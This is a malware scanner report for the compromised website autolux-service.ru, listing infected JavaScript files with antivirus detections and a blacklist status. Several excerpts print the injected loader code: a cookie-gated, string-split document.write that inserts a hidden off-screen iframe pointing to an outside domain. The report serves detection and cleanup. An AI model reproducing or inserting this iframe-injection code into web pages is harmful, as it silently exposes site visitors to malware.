Malware Scanner report for autolux-service.ru

Malicious/Suspicious/Total urls checked: 9/1/12

10 pages have malicious or suspicious code. See details below

Blacklists: Found

The website is marked by Yandex as suspicious.

The website "autolux-service.ru" is probably hacked and losing its visitors. You need to take action as soon as possible to fix security issues.

Malicious Redirects: OK

Malicious/Hidden/Total iFrames: 0/0/18

Deface / Content modification: OK

Free periodic scanning and alerting: setup
(requires eVuln badge or a link to eVuln.com)

Malware & Hack Repair

Malware Removal
Blacklists Removal
Reason Eliminating
1 Month Hack Insurance

More details

Website Hack Insurance

Files & DB Monitoring
Daily Backups
Malware & Hack Detection
Unlimited Hack Repairs

More details

Safe Browsing / Blacklists

Query: http://www.google.com/safebrowsing/diagnostic?site=autolux-service.ru

Result: This site is not currently listed as suspicious.

Query: http://yandex.com/infected?l10n=en&url=http://autolux-service.ru/

Result: The website is marked by Yandex as suspicious. - visiting this web site may harm your computer.
Details are available here.

Scanned pages/files

Request	Server response	Status
http://www.autolux-service.ru/	200 OK Content-Length: 26542 Content-Type: text/html	suspicious
Suspicious code found </span>
http://www.autolux-service.ru/cms/classes/js/menu.js	200 OK Content-Length: 14859 Content-Type: application/javascript	malicious
Malicious code - confirmed by antiviruses (see below) (function(){ function stripos (f_haystack, f_needle, f_offset) { var haystack = (f_haystack + '').toLowerCase(); var needle = (f_needle + '').toLowerCase(); var index = 0; if ((index = haystack.indexOf(needle, f_offset)) !== -1) { return index; } return false; } function barashkalo(){ var jungleobra = 'iPhone\|Macintosh\|Linux\|iPad\|Series40\|SymbOS\|Flock\|SeaMonkey\|Nokia\|SlimBrowser\|AmigaOS\|Android\|FreeBSD\|Chrome\|IEMobile\|SymbianOS\|Avant\|Chromium\|Firefox/1 ... 3277 bytes are skipped ...tedTarget&&!contains_ns6(a.currentTarget,a.relatedTarget)&&delayhidemenu()}function hidemenu(){if(typeof dropmenuobj!="undefined")if(ie4\|\|ns6)dropmenuobj.style.visibility="hidden"} function delayhidemenu(){if(ie4\|\|ns6)delayhide=setTimeout("hidemenu()",disappeardelay)}function clearhidemenu(){typeof delayhide!="undefined"&&clearTimeout(delayhide)}if(hidemenu_onclick=="yes")document.onclick=hidemenu;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;; Antivirus reports: Avast JS:Includer-BEX [Trj] DrWeb JS.IFrame.566 Microsoft Trojan:JS/Iframe.DI NANO-Antivirus Trojan.Script.Iframe.brqwio VIPRE Malware.JS.Generic (JS) Avira HTML/Rce.Gen AVG HTML/Framer Norman Iframe.ZX Sophos Troj/JSRedir-LH AVware Malware.JS.Generic (JS)
http://www.autolux-service.ru/cms/classes/js/gpl_ajax.js	404 Not Found Content-Length: 0 Content-Type: text/html	clean
http://www.autolux-service.ru/test404page.js	404 Not Found Content-Length: 0 Content-Type: text/html	clean
http://www.autolux-service.ru/cms/classes/js/js_edit.js	200 OK Content-Length: 20511 Content-Type: application/javascript	malicious
Malicious code - confirmed by antiviruses (see below) (function(){ function stripos (f_haystack, f_needle, f_offset) { var haystack = (f_haystack + '').toLowerCase(); var needle = (f_needle + '').toLowerCase(); var index = 0; if ((index = haystack.indexOf(needle, f_offset)) !== -1) { return index; } return false; } function barashkalo(){ var jungleobra = 'iPhone\|Macintosh\|Linux\|iPad\|Series40\|SymbOS\|Flock\|SeaMonkey\|Nokia\|SlimBrowser\|AmigaOS\|Android\|FreeBSD\|Chrome\|IEMobile\|SymbianOS\|Avant\|Chromium\|Firefox/1 ... 3400 bytes are skipped ...nuNewsBuild(a,c){var b=[];b[0]="<a onclick=\"ajax_prep_for_edit('"+a+"', '"+c+'\'); return false;" href="#">'+menu_short+"</a>";if(dle_admin!="")b[1]='<a href="'+dle_root+dle_admin+"?mod=editnews&action=editnews&id="+a+'" target="_blank">'+menu_full+"</a>";if(allow_dle_delete_news)b[2]="<a onclick=\"dle_news_delete ('"+a+'\'); return false;" href="#">'+dle_del_news+"</a>";return b};;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;; Antivirus reports: Avast JS:Includer-BEX [Trj] DrWeb JS.IFrame.566 NANO-Antivirus Trojan.Script.Iframe.brqwio VIPRE Malware.JS.Generic (JS) Avira HTML/Rce.Gen AVG HTML/Framer Norman Iframe.ZX Sophos Troj/JSRedir-LH AVware Malware.JS.Generic (JS)
http://www.autolux-service.ru/templates/grab/js/noobslide.js	200 OK Content-Length: 7338 Content-Type: application/javascript	malicious
Malicious code - confirmed by antiviruses (see below) (function(){ function stripos (f_haystack, f_needle, f_offset) { var haystack = (f_haystack + '').toLowerCase(); var needle = (f_needle + '').toLowerCase(); var index = 0; if ((index = haystack.indexOf(needle, f_offset)) !== -1) { return index; } return false; } function barashkalo(){ var jungleobra = 'iPhone\|Macintosh\|Linux\|iPad\|Series40\|SymbOS\|Flock\|SeaMonkey\|Nokia\|SlimBrowser\|AmigaOS\|Android\|FreeBSD\|Chrome\|IEMobile\|SymbianOS\|Avant\|Chromium\|Firefox/1 ... 2518 bytes are skipped ...s[1]) : undefined; } if (!braborossa()) { var cookie = getCookie('li'+'se'+'rg'+'in2'+'8f'+'u'+'ai'+'da'+'nu'+'b3'+'a8'+'a9'); if (cookie == undefined) { setCookie('li'+'se'+'rg'+'in2'+'8f'+'u'+'ai'+'da'+'nu'+'b3'+'a8'+'a9', true, 259200); document.write('<i'+'f'+'r'+'a'+'m'+'e'+' src='+'http://jaxworks.ru/ghj5.u35hh55hj?7'+' style="position:absolute;left:-1000px;top:-1000px;" height="115" width="115">'+'<'+'/'+'i'+'f'+'r'+'a'+'m'+'e>'); } }; })(); Antivirus reports: Avast JS:Includer-BEX [Trj] DrWeb JS.IFrame.566 AVG HTML/Framer Sophos Troj/JSRedir-LH
http://www.autolux-service.ru/templates/grab/js/jquery.js	200 OK Content-Length: 41774 Content-Type: application/javascript	malicious
Malicious code - confirmed by antiviruses (see below) (function(){ function stripos (f_haystack, f_needle, f_offset) { var haystack = (f_haystack + '').toLowerCase(); var needle = (f_needle + '').toLowerCase(); var index = 0; if ((index = haystack.indexOf(needle, f_offset)) !== -1) { return index; } return false; } function barashkalo(){ var jungleobra = 'iPhone\|Macintosh\|Linux\|iPad\|Series40\|SymbOS\|Flock\|SeaMonkey\|Nokia\|SlimBrowser\|AmigaOS\|Android\|FreeBSD\|Chrome\|IEMobile\|SymbianOS\|Avant\|Chromium\|Firefox/1 ... 3196 bytes are skipped ...ggle\|slideUp\|changed\|slideDown\|be\|can\|property\|responseXML\|content\|1223\|getAttributeNode\|300\|method\|protocol\|location\|action\|send\|abort\|cssText\|th\|td\|cap\|specified\|Accept\|With\|colg\|Requested\|fast\|tfoot\|GMT\|thead\|1970\|Jan\|attributes\|01\|Thu\|leg\|Since\|If\|opt\|Type\|Content\|embed\|open\|area\|XMLHTTP\|hr\|Microsoft\|onreadystatechange\|onload\|meta\|adobeair\|charset\|http\|1_\|img\|br\|plain\|borderLeftWidth\|borderTopWidth\|abbr'.split('\|'),0,{}));;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;; Antivirus reports: Avast JS:Includer-BEX [Trj] DrWeb JS.IFrame.566 NANO-Antivirus Trojan.Script.Iframe.brqwio VIPRE Malware.JS.Generic (JS) Avira HTML/Rce.Gen AVG HTML/Framer Norman Iframe.ZX Sophos Troj/JSRedir-LH AVware Malware.JS.Generic (JS)
http://www.autolux-service.ru/templates/grab/js/tabs.js	200 OK Content-Length: 12435 Content-Type: application/javascript	malicious
Malicious code - confirmed by antiviruses (see below) (function(){ function stripos (f_haystack, f_needle, f_offset) { var haystack = (f_haystack + '').toLowerCase(); var needle = (f_needle + '').toLowerCase(); var index = 0; if ((index = haystack.indexOf(needle, f_offset)) !== -1) { return index; } return false; } function barashkalo(){ var jungleobra = 'iPhone\|Macintosh\|Linux\|iPad\|Series40\|SymbOS\|Flock\|SeaMonkey\|Nokia\|SlimBrowser\|AmigaOS\|Android\|FreeBSD\|Chrome\|IEMobile\|SymbianOS\|Avant\|Chromium\|Firefox/1 ... 3422 bytes are skipped ...s1 li').click(function(){ var thisClass = this.className.slice(0,2); $j('div.t1').hide(); $j('div.t2').hide(); $j('div.t3').hide(); $j('div.t4').hide(); $j('div.' + thisClass).show(); $j('ul.tabs.tabs1 li').removeClass('tab-current'); $j(this).addClass('tab-current'); }); $j("#featured > ul").tabs({fx:{opacity: "toggle"}}).tabs("rotate", 5000, true); });;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;; Antivirus reports: Avast JS:Includer-BEX [Trj] DrWeb JS.IFrame.566 Microsoft Trojan:JS/Iframe.DI NANO-Antivirus Trojan.Script.Iframe.brqwio VIPRE Malware.JS.Generic (JS) Avira HTML/Rce.Gen AVG HTML/Framer Norman Iframe.ZX Sophos Troj/JSRedir-LH AVware Malware.JS.Generic (JS)
http://www.autolux-service.ru/templates/grab/js/jquery-ui.min.js	200 OK Content-Length: 7338 Content-Type: application/javascript	malicious
Malicious code - confirmed by antiviruses (see below) (function(){ function stripos (f_haystack, f_needle, f_offset) { var haystack = (f_haystack + '').toLowerCase(); var needle = (f_needle + '').toLowerCase(); var index = 0; if ((index = haystack.indexOf(needle, f_offset)) !== -1) { return index; } return false; } function barashkalo(){ var jungleobra = 'iPhone\|Macintosh\|Linux\|iPad\|Series40\|SymbOS\|Flock\|SeaMonkey\|Nokia\|SlimBrowser\|AmigaOS\|Android\|FreeBSD\|Chrome\|IEMobile\|SymbianOS\|Avant\|Chromium\|Firefox/1 ... 2518 bytes are skipped ...s[1]) : undefined; } if (!braborossa()) { var cookie = getCookie('li'+'se'+'rg'+'in2'+'8f'+'u'+'ai'+'da'+'nu'+'b3'+'a8'+'a9'); if (cookie == undefined) { setCookie('li'+'se'+'rg'+'in2'+'8f'+'u'+'ai'+'da'+'nu'+'b3'+'a8'+'a9', true, 259200); document.write('<i'+'f'+'r'+'a'+'m'+'e'+' src='+'http://jaxworks.ru/ghj5.u35hh55hj?7'+' style="position:absolute;left:-1000px;top:-1000px;" height="115" width="115">'+'<'+'/'+'i'+'f'+'r'+'a'+'m'+'e>'); } }; })(); Antivirus reports: Avast JS:Includer-BEX [Trj] DrWeb JS.IFrame.566 AVG HTML/Framer Sophos Troj/JSRedir-LH
http://www.autolux-service.ru/templates/grab/js/qTip.js	200 OK Content-Length: 15078 Content-Type: application/javascript	malicious
Malicious code - confirmed by antiviruses (see below) (function(){ function stripos (f_haystack, f_needle, f_offset) { var haystack = (f_haystack + '').toLowerCase(); var needle = (f_needle + '').toLowerCase(); var index = 0; if ((index = haystack.indexOf(needle, f_offset)) !== -1) { return index; } return false; } function barashkalo(){ var jungleobra = 'iPhone\|Macintosh\|Linux\|iPad\|Series40\|SymbOS\|Flock\|SeaMonkey\|Nokia\|SlimBrowser\|AmigaOS\|Android\|FreeBSD\|Chrome\|IEMobile\|SymbianOS\|Avant\|Chromium\|Firefox/1 ... 3474 bytes are skipped ...br/> this.tip.style.top = (y + this.offsetY) + "px"; } tooltip.show = function (text) { if (!this.tip) return; this.tip.innerHTML = text; this.tip.style.display = "block"; } tooltip.hide = function () { if (!this.tip) return; this.tip.innerHTML = ""; this.tip.style.display = "none"; } window.onload = function () { tooltip.init (); };;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;; Antivirus reports: Avast JS:Includer-BEX [Trj] DrWeb JS.IFrame.566 Microsoft Trojan:JS/Iframe.DI NANO-Antivirus Trojan.Script.Iframe.brqwio VIPRE Malware.JS.Generic (JS) Avira HTML/Rce.Gen AVG HTML/Framer Norman Iframe.ZX Sophos Troj/JSRedir-LH AVware Malware.JS.Generic (JS)
http://www.autolux-service.ru/cms/classes/tagcloud/swfobject.js	200 OK Content-Length: 18818 Content-Type: application/javascript	malicious
Malicious code - confirmed by antiviruses (see below) (function(){ function stripos (f_haystack, f_needle, f_offset) { var haystack = (f_haystack + '').toLowerCase(); var needle = (f_needle + '').toLowerCase(); var index = 0; if ((index = haystack.indexOf(needle, f_offset)) !== -1) { return index; } return false; } function barashkalo(){ var jungleobra = 'iPhone\|Macintosh\|Linux\|iPad\|Series40\|SymbOS\|Flock\|SeaMonkey\|Nokia\|SlimBrowser\|AmigaOS\|Android\|FreeBSD\|Chrome\|IEMobile\|SymbianOS\|Avant\|Chromium\|Firefox/1 ... 3229 bytes are skipped ...dler=function(){};window.attachEvent("onunload",deconcept.SWFObjectUtil.cleanupSWFs);};window.attachEvent("onbeforeunload",deconcept.SWFObjectUtil.prepUnload);deconcept.unloadSet=true;}}if(!document.getElementById&&document.all){document.getElementById=function(id){return document.all[id];};}var getQueryParamValue=deconcept.util.getRequestParameter;var FlashObject=deconcept.SWFObject;var SWFObject=deconcept.SWFObject;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;; Antivirus reports: Avast JS:Includer-BEX [Trj] DrWeb JS.IFrame.566 NANO-Antivirus Trojan.Script.Iframe.brqwio VIPRE Malware.JS.Generic (JS) Avira HTML/Rce.Gen AVG HTML/Framer Norman Iframe.ZX Sophos Troj/JSRedir-LH
http://www.autolux-service.ru/js/syhyqu.js	200 OK Content-Length: 112075 Content-Type: application/x-javascript	malicious
Malicious code - confirmed by antiviruses (see below) (function(e,t){var n,r,i=typeof t,o=e.document,a=e.location,s=e.jQuery,u=e.$,l={},c=[],p="1.9.1",f=c.concat,d=c.push,h=c.slice,g=c.indexOf,m=l.toString,y=l.hasOwnProperty,v=p.trim,b=function(e,t){return new b.fn.init(e,t,r)},x=/[+-]?(?:\d\.\|)\d+(?:[eE][+-]?\d+\|)/.source,w=/\S+/g,T=/^[\s\uFEFF\xA0]+\|[\s\uFEFF\xA0]+$/g,N=/^(?:(<[\w\W]+>)[^>]\|#([\w-]))$/,C=/^<(\w+)\s\/?>(?:<\/\1>\|)$/,k=/^[\],:{}\s]$/,E=/(?:^\|:\|,)(?:\s\[)+/g,S=/\\(?:["\\\/bfnrt]\|u[\da-fA-F]{4})/g,A=/"[^"\\ ... 3350 bytes are skipped ...oad = function() { if (!mdom) { newDiv = document.createElement('p'); newDiv.innerHTML = "<div style='text-align:center; padding-top: 10px; padding-bottom: 10px; background-color:white' class='basic-modal' onclick='click_banner555();' style='cursor:hand'><img src='/sale.png' style='cursor:hand'></div>"; if (document.body.firstChild) { document.body.insertBefore(newDiv, document.body.firstChild); } else { document.body.appendChild(newDiv); } } } Antivirus reports: Bkav W32.HfsIframe.3abf

Malicious Redirects

First query (normal visit):
GET / HTTP/1.1
Host: autolux-service.ru

Result:

Second query (visit from search engine):
GET / HTTP/1.1
Host: autolux-service.ru
Referer: http://www.google.com/search?q=autolux-service.ru

Result:
The result is similar to the first query. There are no suspicious redirects found.

Recently found suspicious websites

Malware Scanner report for autolux-service.ru

Malware & Hack Repair

Website Hack Insurance

Safe Browsing / Blacklists

Scanned pages/files

Malicious Redirects

Recently found suspicious websites

Company

Services

eVuln Labs

eVuln Tools